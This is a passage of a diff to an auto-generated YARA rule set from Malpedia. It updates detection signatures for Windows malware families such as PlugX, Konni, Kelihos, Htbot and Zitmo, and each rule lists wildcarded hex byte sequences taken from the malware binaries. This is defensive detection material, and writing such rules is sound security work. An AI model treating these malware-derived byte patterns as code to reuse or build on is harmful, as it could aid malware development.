+		$sequence_7 = { c0f305 f9 6a04 87ce 9c 0fbec9 660face902 }
+		$sequence_8 = { 885c2404 887c2404 8d642410 e8???????? 9c 668b3424 }
+		$sequence_9 = { 8d45ec 50 68000f0050 8d8e74040000 57 e8???????? 6a05 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Nestegg_Auto : FILE
+rule MALPEDIA_Win_Unidentified_089_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "52ec43db-af34-5600-ae4f-7af1b99fc246"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nestegg_auto.yar#L1-L101"
+		id = "f61e4a77-808b-5e07-801b-03e57ce838b5"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_089_auto.yar#L1-L98"
 		license_url = "N/A"
-		logic_hash = "998bf1c6b0e9df7e30236e71f3887671a96f6e1e7f5c7700f72ff2a5d20b9889"
+		logic_hash = "f9666eb88fbd91e0eb2e4b4c8812230b36d73d66192fed407aecfaa8f0ed362a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4c2420 33ed 89442444 51 }
-		$sequence_1 = { 6a08 ff15???????? 8be8 b988000000 33c0 8dbc24a8020000 c78424a402000024020000 }
-		$sequence_2 = { 89742410 e8???????? 6a00 6800200000 8d8e2c040000 c744245800000000 }
-		$sequence_3 = { 2bc3 8bce 50 e8???????? 8b8f28040000 }
-		$sequence_4 = { 5f 5e 59 c20c00 ff15???????? }
-		$sequence_5 = { b907000000 f7f9 42 89542410 8b5500 }
-		$sequence_6 = { 7530 50 50 8b44240c 25ffff0000 50 68???????? }
-		$sequence_7 = { 81e1ffff0000 c744243400000000 d1e1 85c9 }
+		$sequence_0 = { 889dd4feffff 899d84feffff 898588feffff 889d74feffff 33c0 }
+		$sequence_1 = { 8b4508 e8???????? c20c00 e8???????? cc 6a30 }
+		$sequence_2 = { f2e9e3000000 55 8bec eb0d ff7508 e8???????? }
+		$sequence_3 = { 83f904 0f8582000000 8b75d0 8bfb }
+		$sequence_4 = { eb0f ff7634 57 ff562c }
+		$sequence_5 = { 88041e 880c1f 0fb6041e 8b4dfc 03c2 8b550c }
+		$sequence_6 = { 3dffffff7f 0f87a2000000 03c0 3d00100000 7227 }
+		$sequence_7 = { 56 6a01 8d4dec 8975d8 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 389120
 }
-rule MALPEDIA_Win_Htbot_Auto : FILE
+rule MALPEDIA_Win_Zitmo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "39a927d2-1945-5991-992e-cc87b6814598"
+		id = "abf7d489-428c-576b-bf50-6d5176838935"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.htbot_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zitmo_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "d80214a974c7da7b11a6b3decefcabbf12f30dbe8a8667d77b9a26c8d44a14ba"
+		logic_hash = "af492533d6f46a2ad9ae3961738d77dc030c3e8231bbc6ee80a9ef330be7fcfa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91731,34 +91838,34 @@ rule MALPEDIA_Win_Htbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6857000780 e8???????? 83c601 8d4e0a 3bcd 0f8db6000000 85f6 }
-		$sequence_1 = { 83c002 6685c9 75f5 2bc2 d1f8 0f88ce020000 }
-		$sequence_2 = { 8d7c241c 8d442420 c644246003 e8???????? 85c0 0f84e1000000 8d4900 }
-		$sequence_3 = { c68424b410000004 e8???????? 8b442430 8b00 8b8c24b8100000 8d542448 }
-		$sequence_4 = { 8b11 50 8b4204 ffd0 c64424340a 8b44241c }
-		$sequence_5 = { 51 8b4ef0 8b11 8b4210 83c6f0 89642428 8bdc }
-		$sequence_6 = { 8b4c2414 51 ff15???????? 8d54241c 52 }
-		$sequence_7 = { 8b11 8b4204 57 ffd0 83c510 896c2414 }
-		$sequence_8 = { 384802 7550 384803 744b 83c004 3808 7418 }
-		$sequence_9 = { 2bc1 d1f8 83f8ff 755c 3959f4 }
+		$sequence_0 = { 23cb 8bd6 ff75a0 e8???????? }
+		$sequence_1 = { 55 8bec 81c434ffffff f7df 8bf0 49 }
+		$sequence_2 = { 8175b437340000 23f9 f7d1 03d7 f7d2 }
+		$sequence_3 = { 4b f7de c745bc36343335 03c3 f7da f7d1 }
+		$sequence_4 = { ffb584feffff 56 e8???????? ffb574ffffff }
+		$sequence_5 = { f7df 894da8 8955d0 ffb560feffff e8???????? c9 }
+		$sequence_6 = { f7d7 ff45b4 8bcf f7d6 03fa 8d9568ffffff }
+		$sequence_7 = { 81759437320000 3145b8 41 23c6 }
+		$sequence_8 = { 42 4e f7df 03d7 48 40 }
+		$sequence_9 = { 23cb 4a f7d0 8955c4 c9 c20c00 55 }
 
 	condition:
-		7 of them and filesize < 196608
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Cobint_Auto : FILE
+rule MALPEDIA_Win_Cradlecore_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb358b61-4ba2-55a7-8a20-31d71cd4f25b"
+		id = "fec2c384-0d7c-5ffa-a383-057dccfbd935"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobint_auto.yar#L1-L232"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cradlecore_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "a45731be84e3fdba6ba2e9fa2e98a6d98c16a2eb8dae8c7026872152dd218ff0"
+		logic_hash = "cc04ae06802f62915d99191dfee1f4ad76dcf5fb1c40032e747d4c7261b81445"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91770,48 +91877,34 @@ rule MALPEDIA_Win_Cobint_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c418 a1???????? 03c9 891cc8 8b0d???????? a1???????? }
-		$sequence_1 = { 891cc8 8b0d???????? a1???????? 03c9 8974c804 8b0d???????? }
-		$sequence_2 = { c745f404000000 50 8d4508 50 6805000020 56 }
-		$sequence_3 = { 50 8d45f4 50 8d45ec 50 6813000020 ff75f0 }
-		$sequence_4 = { 57 6a65 eb31 85db 743a }
-		$sequence_5 = { e8???????? 83c410 eb60 6a01 8d450f }
-		$sequence_6 = { 57 bf00020000 57 e8???????? 57 6a00 }
-		$sequence_7 = { 83f820 7cf3 eb07 8bf0 c1e604 03f2 57 }
-		$sequence_8 = { 740d 8b5508 0355f0 8a45ec }
-		$sequence_9 = { 31b7807c30ae 807c909090 90 bdfd807c90 }
-		$sequence_10 = { 8bcb 897db8 e8???????? 8bf0 }
-		$sequence_11 = { 81ffea968891 740a 33c0 8b12 85d2 }
-		$sequence_12 = { ffd6 eb03 8b75e4 ff75d8 ffd6 }
-		$sequence_13 = { 395318 763c 8b3c90 33c0 03fe }
-		$sequence_14 = { 90 90 90 e10b }
-		$sequence_15 = { b800a80000 2bc7 50 56 53 ff55f8 85c0 }
-		$sequence_16 = { 8802 eb0b 8b4d08 034df0 }
-		$sequence_17 = { bffc807c28 1a807c170e81 7cd7 9b 807c909090 90 90 }
-		$sequence_18 = { 749b 807ce19a80 7c90 90 }
-		$sequence_19 = { 90 e10b 96 7c90 90 }
-		$sequence_20 = { bab1c50790 8bf0 33ff e8???????? 8d4dec 8945f8 }
-		$sequence_21 = { ffd0 85c0 0f8406010000 8b4de0 ba6a62f095 }
-		$sequence_22 = { e8???????? 8945f8 8d45c4 50 }
-		$sequence_23 = { e8???????? 58 83c005 c3 31b7807c30ae }
+		$sequence_0 = { e8???????? 8d45d8 c645fc1c 50 e8???????? 8d4590 c645fc1d }
+		$sequence_1 = { 8bf8 e9???????? 8b8528e5ffff 8b0c85f01f4300 8b8524e5ffff f644080480 0f8475030000 }
+		$sequence_2 = { 03d9 014c2410 8b54240c 11442414 2bf1 1bf8 8b422c }
+		$sequence_3 = { 8d4db0 8945fc e8???????? 8b55fc 8bcf f7d1 }
+		$sequence_4 = { 8bc3 2b450c 741b 50 }
+		$sequence_5 = { 50 51 8d8c248c000000 e8???????? 8b5508 8d4c2468 }
+		$sequence_6 = { 395c2430 726f 837c243410 8b442420 7304 }
+		$sequence_7 = { c1e606 c1e910 c0e107 8b1485f01f4300 8a443224 }
+		$sequence_8 = { 8b7508 6a00 53 8d4c2430 e8???????? 8bc6 8b4c2444 }
+		$sequence_9 = { 59 85c0 7831 8b1cc55c5e4200 6a55 53 e8???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Zenar_Auto : FILE
+rule MALPEDIA_Win_Plugx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "33657347-5dc4-5466-88de-08ba2a4ff542"
+		id = "087f4536-9e07-5d7f-a0d5-0a134931bcd8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zenar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zenar_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plugx_auto.yar#L1-L286"
 		license_url = "N/A"
-		logic_hash = "b1dde475bc16460bb8f7878e012acfd9a678e7c83f20d6fc1c96df7645d0898c"
+		logic_hash = "341c1f01e0832398e975d439fb075776745e2dea735d9688a1d350eef060bf14"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91823,32 +91916,55 @@ rule MALPEDIA_Win_Zenar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d8c 51 50 e8???????? 59 }
-		$sequence_1 = { 751a 83f8ff 740f 83f8fe 740a 6bcf38 030c9598ae4300 }
-		$sequence_2 = { 83c801 50 6800000080 ff7508 e8???????? 5d }
-		$sequence_3 = { 56 ff7508 e8???????? 83c40c e9???????? 8b048d98ae4300 807c022800 }
-		$sequence_4 = { 68???????? eb0c 68???????? eb05 68???????? e8???????? 39be90000000 }
-		$sequence_5 = { 8bf1 57 ff750c 33ff 8975fc 8d4e0c c706???????? }
-		$sequence_6 = { c3 6857000780 68???????? 8d4df0 e8???????? 68???????? 8d45f0 }
-		$sequence_7 = { 8945fc 56 ff750c 8b7508 8d45fa 50 8975c8 }
-		$sequence_8 = { 3bfe 72f3 33c0 66890472 8bc3 }
-		$sequence_9 = { 48 6a5c 5e 8d0442 eb0d 6683f92f 740f }
+		$sequence_0 = { 55 8bec 51 0fb74612 }
+		$sequence_1 = { 55 8bec 8b450c 81780402700000 }
+		$sequence_2 = { 53 6a00 6a00 6a02 ffd0 85c0 }
+		$sequence_3 = { 51 56 57 6a1c 8bf8 e8???????? 8bf0 }
+		$sequence_4 = { 56 8b750c 8b4604 050070ffff }
+		$sequence_5 = { 41 3bca 7ce0 3bca }
+		$sequence_6 = { 0145f4 8b45fc 0fafc3 33d2 }
+		$sequence_7 = { e8???????? 85c0 7508 e8???????? 8945fc }
+		$sequence_8 = { e8???????? 3de5030000 7407 e8???????? }
+		$sequence_9 = { 85c0 7413 e8???????? 3de5030000 }
+		$sequence_10 = { e8???????? 85c0 7407 b84f050000 }
+		$sequence_11 = { 50 ff15???????? a3???????? 8b4d18 }
+		$sequence_12 = { e8???????? 85c0 750a e8???????? 8945fc }
+		$sequence_13 = { 85c0 750d e8???????? 8945f4 }
+		$sequence_14 = { 6a00 6a00 6a04 6a00 6a01 6800000040 57 }
+		$sequence_15 = { 57 e8???????? eb0c e8???????? }
+		$sequence_16 = { 51 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 }
+		$sequence_17 = { 6819000200 6a00 6a00 6a00 51 }
+		$sequence_18 = { 50 ff75e8 6802000080 e8???????? }
+		$sequence_19 = { ffd7 a3???????? 56 ffd0 }
+		$sequence_20 = { 6a01 6a00 e8???????? a3???????? 6800080000 68???????? }
+		$sequence_21 = { 51 6a02 e8???????? 6800f00000 }
+		$sequence_22 = { 89442424 8b442424 6808020000 6a00 }
+		$sequence_23 = { 6800080000 68???????? e8???????? 6800080000 68???????? e8???????? }
+		$sequence_24 = { 6808020000 6a00 ff74242c e8???????? }
+		$sequence_25 = { 5d c21000 55 53 57 56 83ec18 }
+		$sequence_26 = { 89742434 89f1 8b442434 e8???????? }
+		$sequence_27 = { 50 56 ffb42480000000 ff15???????? }
+		$sequence_28 = { 50 6802000080 53 e8???????? }
+		$sequence_29 = { 6a5c ff74241c e8???????? 83c408 }
+		$sequence_30 = { 56 ff742478 ffd0 89442420 }
+		$sequence_31 = { 6a00 ff74245c e8???????? 83c40c }
+		$sequence_32 = { 40 eb95 89f1 c644242a00 }
 
 	condition:
-		7 of them and filesize < 519168
+		7 of them and filesize < 1284096
 }
-rule MALPEDIA_Win_Bbsrat_Auto : FILE
+rule MALPEDIA_Win_Horus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a602361e-80e2-5b74-861b-7270dd69ebb0"
+		id = "69a4cf35-2806-517b-bb53-0add97c1f457"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bbsrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bbsrat_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.horus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.horus_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "9e349c993b7b920b82b539668c983c2083c9d2bb77a365140f827640d24e311d"
+		logic_hash = "98e7222b64c7a567c8f798abf5f3ca917bf88c189a0e21ef9e9894081482246f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91862,34 +91978,34 @@ rule MALPEDIA_Win_Bbsrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b0a 7411 837e3800 7d05 8d48fa 890b }
-		$sequence_1 = { 52 50 55 e8???????? 8d8c2418140000 51 68???????? }
-		$sequence_2 = { 3b7e28 7cf2 8b4b10 2b4b0c f7c1f0ffffff 0f84c1000000 8b5618 }
-		$sequence_3 = { 3488 34a8 34b0 34c4 34cc 34e0 34e8 }
-		$sequence_4 = { 33db f7442410fcffffff 0f86d5000000 6800060000 8d8c241c100000 56 }
-		$sequence_5 = { 8bd0 89442428 83fe04 722c 8bff 8b0a 8b542414 }
-		$sequence_6 = { 52 897b08 e8???????? f7d8 1bc0 }
-		$sequence_7 = { e8???????? 6a36 8d4c246c 51 8d5610 6a46 52 }
-		$sequence_8 = { e8???????? 85c0 752d 8b560c 895608 ff15???????? }
-		$sequence_9 = { 7536 80780300 7530 80780400 752a 80780500 7524 }
+		$sequence_0 = { 8b456f 3bc7 0f8458ffffff 488b757f 897d6f 8b456f 3bc7 }
+		$sequence_1 = { 57 4883ec20 488b19 488bf9 4885db 0f84de000000 488b7378 }
+		$sequence_2 = { 4c8945e8 488d4550 488945e0 65488b042560000000 488b4818 488b4110 488b08 }
+		$sequence_3 = { 480f499df0000000 4885db 742f 488d4307 b908000000 8000d9 48ffc8 }
+		$sequence_4 = { 488b5df8 eb02 33db 4885db 7429 488d4307 b908000000 }
+		$sequence_5 = { 4c8bc6 488bc8 33d2 ff15???????? 49833c2400 0f8494000000 bd01000000 }
+		$sequence_6 = { 83632c00 83633000 c7456f04fa0100 e9???????? 83637c00 488d4b04 488bd6 }
+		$sequence_7 = { 7457 3d21c40100 0f84d8000000 3d84c80100 0f85cf000000 488b4580 4885c0 }
+		$sequence_8 = { b803000000 c3 83792800 7427 488b5118 48837a0800 741c }
+		$sequence_9 = { 0f849e000000 3d45940100 7465 3d56a60100 7441 3dffdc0100 7424 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 887808
 }
-rule MALPEDIA_Win_Atlantida_Auto : FILE
+rule MALPEDIA_Win_Konni_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "449807de-c2d1-5bb0-a23b-6b1bb9a18e58"
+		id = "f5f4e6b0-9bc7-5563-95be-e81e34e13947"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlantida"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atlantida_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.konni_auto.yar#L1-L466"
 		license_url = "N/A"
-		logic_hash = "5a71a5b3ff4a38d6154af29c3b9c4fd13de9adafd3282b12a56385b9c3f01092"
+		logic_hash = "848a6314b768526873d5e9f7192d61992e122b75278ca60f0df452953ea07af0"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -91901,32 +92017,73 @@ rule MALPEDIA_Win_Atlantida_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d8 33d9 03f1 c1f2eb c1b454002000f03f 668b840780fd47a1 0fb68c54002000f0 }
-		$sequence_1 = { e9???????? f7d2 66d1e8 0fca 0f81cb3a0a00 33da 59 }
-		$sequence_2 = { f6d9 d0c9 80e9b9 fec0 fec0 c1c20c 32d9 }
-		$sequence_3 = { f7da fec0 f6d0 42 6698 e8???????? 0f34 }
-		$sequence_4 = { f7d2 66898c8706fefdff 0fbeca 8b144f f6d8 0fabc0 d2c1 }
-		$sequence_5 = { ffc7 6641 d1c7 6645 0fc1d5 48 99 }
-		$sequence_6 = { ff5315 14a8 6292bfc572de 1ad7 381d???????? 50 a9dac0aaf7 }
-		$sequence_7 = { e8???????? 8b442500 ba90b9872b 80e298 8d0c55ad51af3f 8b8c55e48cf0a8 661bd2 }
-		$sequence_8 = { fec0 33d3 6633c9 2d0066b83d 35a05ea552 42 f7da }
-		$sequence_9 = { f7d8 33d8 0fca 66c1f90b 0f878f9f1200 03f0 660fa3d1 }
+		$sequence_0 = { 52 50 8b45e8 0fb6cc 51 0fb6d0 52 }
+		$sequence_1 = { 85c0 7527 0fb655eb 0fb645ea }
+		$sequence_2 = { 03c0 334604 03c0 334608 03c0 33460c 03c0 }
+		$sequence_3 = { 83c418 8b45e4 50 ff15???????? }
+		$sequence_4 = { a1???????? 33c5 8945fc 8b0d???????? 8a15???????? 33c0 }
+		$sequence_5 = { 57 8b7d10 8985f4feffff 33f6 }
+		$sequence_6 = { 85c0 0f84f1000000 0f88eb000000 83f801 7508 }
+		$sequence_7 = { 7908 49 81c900ffffff 41 8a940df8feffff }
+		$sequence_8 = { 83f801 750a c705????????01000000 890d???????? }
+		$sequence_9 = { 33c9 83f802 7508 890d???????? }
+		$sequence_10 = { eb1e 83f804 740f c705????????02000000 }
+		$sequence_11 = { 6a01 ff15???????? 50 a3???????? }
+		$sequence_12 = { 68b6030000 6a0d 50 ff15???????? }
+		$sequence_13 = { 7508 890d???????? eb1e 83f804 }
+		$sequence_14 = { eb02 33c9 e8???????? 8bf8 }
+		$sequence_15 = { 68???????? ffd6 83c8ff 5f 5e 5b 8b4dfc }
+		$sequence_16 = { 0fb6591c 88581c 0fb6591d 88581d 0fb6591e }
+		$sequence_17 = { ffd6 8b4d08 51 ffd6 53 ffd6 }
+		$sequence_18 = { 68???????? 8d8df0faffff 51 ffd6 8b35???????? 8d95f0faffff }
+		$sequence_19 = { 8d8df8feffff 51 8d95f0fcffff 52 6a00 6a00 }
+		$sequence_20 = { 4c89742420 ff15???????? 488bd8 4885c0 744f }
+		$sequence_21 = { 8db768020000 8916 56 e8???????? 8a8c30dec44600 }
+		$sequence_22 = { 660f1f440000 498bc8 ba04000000 0f1f840000000000 0fb601 4883c104 48ffca }
+		$sequence_23 = { 8d8df4fdffff 51 ff15???????? 85c0 755b 57 }
+		$sequence_24 = { 52 6a00 6a00 ff15???????? 68d0070000 ff15???????? 8b4dfc }
+		$sequence_25 = { ff15???????? 8b3d???????? be0a000000 68e8030000 ffd7 }
+		$sequence_26 = { 6a00 8d8df8feffff 51 8d95f0fcffff }
+		$sequence_27 = { d3ea 33c9 56 e8???????? 8a8c30a6c44600 }
+		$sequence_28 = { e8???????? 8a8c30dec44600 5e bb01000000 83c604 d3e3 }
+		$sequence_29 = { 8a8664020000 8b9cae68020000 33d2 56 e8???????? 8a9435dec44600 5e }
+		$sequence_30 = { e8???????? 8a9435dec44600 5e 84c0 8bfa 7476 83ff03 }
+		$sequence_31 = { e8???????? 8a8c30a6c44600 5e 8b442414 03ca }
+		$sequence_32 = { ff15???????? 488bcb ff15???????? 488d8c24e0000000 33d2 }
+		$sequence_33 = { 57 6804010000 8d95f8feffff 52 }
+		$sequence_34 = { 488945c0 488d45b8 482bf0 6666666666660f1f840000000000 ba04000000 6666660f1f840000000000 0fb6040e }
+		$sequence_35 = { 33db 56 e8???????? 8a9c30c2c44600 5e 83f908 }
+		$sequence_36 = { 41b850000000 4533c9 488bd3 488bc8 c744242803000000 }
+		$sequence_37 = { 68???????? 8d95f8feffff 52 ffd6 6804010000 8d85f0fcffff 50 }
+		$sequence_38 = { bbedffffff 03dd 81eb00200200 83bd9404000000 899d94040000 }
+		$sequence_39 = { 8d3c85e0a30010 8bc3 80c901 83e01f 884d0b 8d34c0 8b07 }
+		$sequence_40 = { 8d0c9de0a30010 8d9080040000 8901 3bc2 7318 80600400 }
+		$sequence_41 = { bb???????? 7539 e8???????? 68???????? 53 }
+		$sequence_42 = { 4963cb 41ffc1 48ffc3 0fb6040c 8843ff 40883c0c }
+		$sequence_43 = { 80a0a0a1001000 40 41 41 3bc6 72bf }
+		$sequence_44 = { 4963ca 0fb6040c 4288040c 44881c0c 420fb60c0c 4103cb 81e1ff000080 }
+		$sequence_45 = { 7468 488d44246c 4c8d8c2480010000 4c8d442430 488d15b1190100 }
+		$sequence_46 = { 66c705????????0100 837e0811 7509 66c705????????0100 837e0856 7514 66833d????????01 }
+		$sequence_47 = { 8b348de0a30010 8d1c8de0a30010 8d3cc0 c1e702 03f7 837e0800 }
+		$sequence_48 = { 4c8bb42480180000 4c8ba42488180000 488bbc2490180000 4889742458 }
+		$sequence_49 = { 418bf1 8bea 458bda 418bc2 488d0c24 0f1f8000000000 8801 }
+		$sequence_50 = { 85c0 0f85e0feffff 488bbc2430010000 488b9c2420010000 4c8ba42438010000 }
 
 	condition:
-		7 of them and filesize < 13793280
+		7 of them and filesize < 2361344
 }
-rule MALPEDIA_Win_Enfal_Auto : FILE
+rule MALPEDIA_Win_Loup_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "664ed877-3f83-5f6a-92fa-e1c35cd0edbd"
+		id = "1404f79d-5679-58f8-95e7-ea2d681e99b9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.enfal_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.loup"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.loup_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "872fbd5343bee5c1e22067a7277b79e519c2acefc43b08d0086dc684465dbd92"
+		logic_hash = "01fac51b45c233a343e6af089564cab69dab8dfa8648336955517c666022b803"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -91940,71 +92097,71 @@ rule MALPEDIA_Win_Enfal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8648020000 68???????? 50 }
-		$sequence_1 = { bffe010000 eb05 bff4010000 8bc7 5e eb02 }
-		$sequence_2 = { 51 8d8de8fcffff 51 53 ff505c 85c0 }
-		$sequence_3 = { 8d85b4fdffff 68???????? 50 e8???????? 8d85b4fdffff 57 }
-		$sequence_4 = { 8bec 81eccc040000 53 56 8b35???????? 57 }
-		$sequence_5 = { 89430c ffd6 8b4b1c 68???????? 57 }
-		$sequence_6 = { 50 e8???????? 8d8628020000 68???????? }
-		$sequence_7 = { 0fb645da 8d0480 8dbc0059020000 eb54 8b8548ffffff }
-		$sequence_8 = { 6a01 57 ff15???????? 8bf0 85f6 0f848e000000 8b4624 }
-		$sequence_9 = { 57 8901 ffd6 8b4b1c 68???????? 57 }
+		$sequence_0 = { 8b4508 50 8d8de0fbffff 51 8d95f0fdffff 52 }
+		$sequence_1 = { 668945e8 33c0 668945ea c745ee01000000 b804000000 }
+		$sequence_2 = { 8d15341a4100 e8???????? 58 5a 5f 5e }
+		$sequence_3 = { 33c5 8945fc b9???????? e8???????? c745c000000000 c745b400000000 }
+		$sequence_4 = { c784055cffffff01000000 8d855cffffff 8945d5 8bf4 6a03 }
+		$sequence_5 = { 7709 8b048514824100 5d c3 33c0 }
+		$sequence_6 = { c705????????01000000 b904000000 6bd100 c78264a1410002000000 b804000000 6bc800 }
+		$sequence_7 = { a1???????? 8985c4fbffff 8b0d???????? 898dc8fbffff 8b15???????? }
+		$sequence_8 = { 668945e8 33c0 668945ea c745ee01000000 }
+		$sequence_9 = { 51 e8???????? 85c0 7513 8b45f4 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 257024
 }
-rule MALPEDIA_Win_Kelihos_Auto : FILE
+rule MALPEDIA_Win_Unidentified_102_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ce7cec0-9b63-57ad-afe3-2ac567126cba"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kelihos_auto.yar#L1-L134"
+		id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_102_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c2eacbb99d14be28a148d8ab81d8255fe39a06721e8fc3e2b106469f00f3e62c"
+		logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
